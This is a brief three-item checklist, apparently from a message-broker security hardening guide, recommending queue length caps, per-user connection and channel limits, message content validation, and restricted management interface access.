- ✅ Cap queues with max-length policies and set per-user connection and channel limits
- ✅ Validate and sanitize message content
- ✅ Restrict management interface access